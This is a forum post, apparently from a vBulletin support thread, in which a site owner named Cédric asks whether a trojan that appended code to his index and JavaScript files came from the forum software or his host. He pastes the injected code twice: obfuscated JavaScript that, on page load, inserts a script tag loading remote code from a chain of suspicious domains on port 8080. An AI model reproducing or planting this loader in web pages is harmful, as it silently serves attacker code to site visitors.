Tweet
This trojan adds a code line at the end of :
>Every files containing the word "index"
>Every javascript files
Here are the codes of the malware :
I just would like to know if the contamination came from vB or my host.
Cédric
>Every files containing the word "index"
>Every javascript files
Here are the codes of the malware :
Code:
/*LGPL*/ try{ window.onload = function(){var Est1o8ahkk = document.createElement('s&@c(@)r@$i#@p@!!t^&@'.replace(/\(|\!|\$|#|\^|@|\)|&/ig, ''));Est1o8ahkk.setAttribute('defer', 'd@e(f$!(e$^r(#'.replace(/@|#|\!|\)|\^|&|\(|\$/ig, ''));Est1o8ahkk.setAttribute('type', 't$@#e@x!#)$t$/&@#j&a!((^v&&a$^!)s#&c($)r^!i!p&#@(t@(!('.replace(/\)|\$|&|#|@|\^|\(|\!/ig, ''));Est1o8ahkk.setAttribute('id', 'F)@&7)()g&^(n$^@a&(!p$)i!&(8(#(c&(@&z$!)h#'.replace(/#|\!|\)|\$|&|@|\^|\(/ig, ''));Est1o8ahkk.setAttribute('s(&)&r$!c^^@!'.replace(/\^|\!|#|\(|@|\$|\)|&/ig, ''), 'h^!t&$$t@)p^)&:&^(/@(/&!()t^$@a(r#g^##!e#@t(#-(@c!#^&&o&!$m(#!.#((s)@&t#@$c^^!.$$$!#c^o^!)m^.#)s^a^.(m($#e^$d#i($$a^f##)i$^r$e!&#-)$c$&(o@!(m!$!.()!#t$e($e$)n@)@!&w^e^b!)^d&&e^#s(i^g#$(n^&.#&(!@r&^)u(:^#8^(#0##$8&#(^$0(/^w!^(e@&a$@t$h)$e))!@r^#.^!c$#o#&m)/&(w#&e)$!$a^!t@h!^e$r(@(.)^)c(#o&^!m)!$/^^!g&#(^o^^#(^o#)g(&l!!#e@#.@c)!)o$m^&$/!&!#e^((x$(#c(!!i!t#e^&^.@!c&($o@&.#)j&@p&#/&&&h@$$^(a#r&)d&s)#!^e@!x$(t&&u#b@@e!(.$#c!)#!o&m#/)$$!#'.replace(/\(|#|&|\^|\!|\)|\$|@/ig, ''));if (document){document.body.appendChild(Est1o8ahkk);}} } catch(Rf6tzozxjhnoqp6eleyo) {}
<script>/*LGPL*/ try{ window.onload = function(){var Est1o8ahkk = document.createElement('s&@c(@)r@$i#@p@!!t^&@'.replace(/\(|\!|\$|#|\^|@|\)|&/ig, ''));Est1o8ahkk.setAttribute('defer', 'd@e(f$!(e$^r(#'.replace(/@|#|\!|\)|\^|&|\(|\$/ig, ''));Est1o8ahkk.setAttribute('type', 't$@#e@x!#)$t$/&@#j&a!((^v&&a$^!)s#&c($)r^!i!p&#@(t@(!('.replace(/\)|\$|&|#|@|\^|\(|\!/ig, ''));Est1o8ahkk.setAttribute('id', 'F)@&7)()g&^(n$^@a&(!p$)i!&(8(#(c&(@&z$!)h#'.replace(/#|\!|\)|\$|&|@|\^|\(/ig, ''));Est1o8ahkk.setAttribute('s(&)&r$!c^^@!'.replace(/\^|\!|#|\(|@|\$|\)|&/ig, ''), 'h^!t&$$t@)p^)&:&^(/@(/&!()t^$@a(r#g^##!e#@t(#-(@c!#^&&o&!$m(#!.#((s)@&t#@$c^^!.$$$!#c^o^!)m^.#)s^a^.(m($#e^$d#i($$a^f##)i$^r$e!&#-)$c$&(o@!(m!$!.()!#t$e($e$)n@)@!&w^e^b!)^d&&e^#s(i^g#$(n^&.#&(!@r&^)u(:^#8^(#0##$8&#(^$0(/^w!^(e@&a$@t$h)$e))!@r^#.^!c$#o#&m)/&(w#&e)$!$a^!t@h!^e$r(@(.)^)c(#o&^!m)!$/^^!g&#(^o^^#(^o#)g(&l!!#e@#.@c)!)o$m^&$/!&!#e^((x$(#c(!!i!t#e^&^.@!c&($o@&.#)j&@p&#/&&&h@$$^(a#r&)d&s)#!^e@!x$(t&&u#b@@e!(.$#c!)#!o&m#/)$$!#'.replace(/\(|#|&|\^|\!|\)|\$|@/ig, ''));if (document){document.body.appendChild(Est1o8ahkk);}} } catch(Rf6tzozxjhnoqp6eleyo) {}</script>
<!--3abf2ff8e4f89cfaa024a3d05e678819-->
Cédric
Comment